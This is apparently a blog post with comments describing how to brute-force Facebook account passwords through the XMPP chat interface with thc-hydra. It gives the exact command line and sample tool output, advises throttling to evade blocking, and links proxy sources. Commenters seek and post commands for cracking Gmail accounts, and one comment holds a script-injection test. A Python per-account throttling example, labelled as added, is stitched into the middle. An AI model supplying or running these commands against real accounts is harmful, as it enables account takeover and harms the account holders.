Just a short reminder that you can easily brute-force Facebook accounts using the chat interface (XMPP) and thc-hydra (a very fast brute-force tool that also supports wordlists).
XMPP support was added in version 7.x, so be sure to have the latest version. (It compiles for XMPP out of the box, so even if you don't have all the libraries for SSH/MySQL/… it might work.)
Here is an example of the command line:
hydra -C /tmp/username_pw_combo_list.txt -s 5222 -f -V -S chat.facebook.com xmpp
That's it, but remember to throttle your attacks. After some wrong logins Facebook will block you from using XMPP. It will look like this in hydra:
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-xx xx:xx:xx
[DATA] 1 task, 1 server, 994 login tries, ~994 tries per task
[DATA] attacking service xmpp on port 5222
[ATTEMPT] target chat.facebook.com - login "a@b.com" - pass "xxx" - 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com - login "a@b.com" - pass "xxx" - 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com - login "a@b.com" - pass "xxx" - 1 of 994 [child 0]
[ERROR] Too many connect errors to target, disabling xmpp://chat.facebook.com:5222
0 of 1 target successfuly completed, 0 valid passwords found
[ERROR] 1 target did not resolve or could not be connected
Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-xx xx:xx:xx
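Seen from the server side, the block shown above is a failed-login throttle. The following is an added example, not code from the original post or from Facebook, of a throttle that counts failures per account across every login interface and source address instead of per IP; the event format, thresholds and function names are assumptions, and the sample events are constructed.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 300  # assumed sliding window
MAX_FAILURES = 5      # assumed failures tolerated per account inside the window

# Constructed sample events: (unix_time, interface, source_ip, account, success)
SAMPLE_EVENTS = [
    (1000, "xmpp", "192.0.2.10", "a@b.com", False),
    (1020, "xmpp", "192.0.2.11", "a@b.com", False),
    (1040, "xmpp", "198.51.100.7", "a@b.com", False),
    (1060, "web", "198.51.100.8", "a@b.com", False),
    (1080, "xmpp", "203.0.113.5", "a@b.com", False),
    (1100, "xmpp", "203.0.113.6", "a@b.com", False),
    (1110, "web", "192.0.2.50", "c@d.com", False),
    (1120, "web", "192.0.2.50", "c@d.com", True),
]

def find_throttled_accounts(events, window=WINDOW_SECONDS, limit=MAX_FAILURES):
    """Flag accounts with more than `limit` failed logins inside `window` seconds,
    counted across all interfaces and source addresses."""
    recent = defaultdict(deque)  # account -> (time, interface, source_ip) of failures
    flagged = {}
    for ts, interface, source_ip, account, success in sorted(events):
        if success:
            recent[account].clear()  # a successful login resets that account's count
            continue
        q = recent[account]
        q.append((ts, interface, source_ip))
        while ts - q[0][0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) > limit and account not in flagged:
            flagged[account] = {
                "blocked_at": ts,
                "interfaces": sorted({f[1] for f in q}),
                "distinct_ips": len({f[2] for f in q}),
            }
    return flagged

def max_failures_from_one_ip(events, account):
    """What a per-IP counter would see: the most failures from any single address."""
    per_ip = defaultdict(int)
    for _, _, source_ip, acct, success in events:
        if acct == account and not success:
            per_ip[source_ip] += 1
    return max(per_ip.values(), default=0)

if __name__ == "__main__":
    print(find_throttled_accounts(SAMPLE_EVENTS))
    print(max_failures_from_one_ip(SAMPLE_EVENTS, "a@b.com"))
```

In the sample, no single address fails more than once, so a per-IP counter never fires, while the per-account counter flags the account on the sixth failure regardless of which interface it arrived on.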
This guy tweets a list of proxies if you need some ;)
https://twitter.com/crazyjunkie1
http://pastebin.com/u/gelbeseiten
Examples: http://pastebin.com/raw.php?i=EXUYq9Hh, http://pastebin.com/raw.php?i=BjbqBxJT, http://pastebin.com/raw.php?i=tkT45MBE
Can you please share the actual command syntax for a Facebook account?
For example, I am running hydra -S -l xxxxx@gmail.com -x 6:8:al -w 32 -e ns -V -s 465 smtp-gmail.com smtp for a Gmail account.
Are you sure about the port? For me 465 is not open. Also I never tried it for gmail…
PORT STATE SERVICE VERSION
25/tcp open smtp
465/tcp filtered smtps
filtered == open
Please, what is the actual command for Gmail cracking with a wordlist?
OK, if I'm looking to use a wordlist for a username I already know, what would that look like?
Can you tell the full method with correct codes? Because the password is not showing; it is coming in question marks.
Interesting idea to avoid the security associated with the web login panel. Great!
alert(“Hello”);
What's in here, man, passwords and username or just username: /tmp/username_pw_combo_list.txt?
It's a riddle for the patient reader.